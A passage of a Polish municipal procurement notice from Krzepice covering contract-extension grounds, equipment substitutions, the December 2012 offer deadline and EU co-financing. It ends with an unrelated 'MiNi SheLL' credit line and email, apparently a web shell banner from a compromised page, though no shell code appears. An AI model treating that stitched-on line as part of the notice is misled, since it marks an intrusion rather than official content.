                   wykonanie umowy i na który - w ich wyniku - jej wykonanie zostało przerwane) 
                   lub
                - działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego (o czas 
                   niezbędny do wykonania zamówienia) lub
                 - nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazania przez 
                   Zamawiającego terenu budowy Wykonawcy ( o czas nieterminowego przekazania 
                   terenu budowy) lub
                - wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych 
                   przez Wykonawcę (o czas, w którym - na skutek tych zdarzeń - nie było możliwe 
                   wykonanie umowy i na który - w ich wyniku - jej wykonanie zostało przerwane) 
                   lub
                - opóźnieniem związanym z uzyskaniem przez Wykonawcę niezbędnych w myśl 
                   ustawy Prawo budowlane dokumentów (o czas niezbędny na uzyskanie tych 
                   dokumentów) lub
                - przedłużeniem procedury udzielenia zamówienia np. odwołanie (o czas przedłużenia 
                  procedury )  lub
                - koniecznością wykonania zamówień dodatkowych (o czas niezbędny do  wykonania       
                  tych robót).
              c) inne zmiany:
               - zmiany urządzeń oferowanych przez Wykonawcę w ofercie, na modele nowszej 
                 generacji o tych samych lub wyższych parametrach, jeżeli maszyny i urządzenia 
                 oferowane wyszły z produkcji, lub nie są dla nich dostępne części zamienne lub 
                 serwisowanie. Zmiana ta może nastąpić jedynie po uzyskaniu zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krzepice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krzepicach ul. Częstochowska 13, 42-160 Krzepice, pok. nr 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2012 godzina 11:00, miejsce: Urząd Miejski w Krzepicach ul. Częstochowska nr 13,        42-160 Krzepice, sekretariat pok. Nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com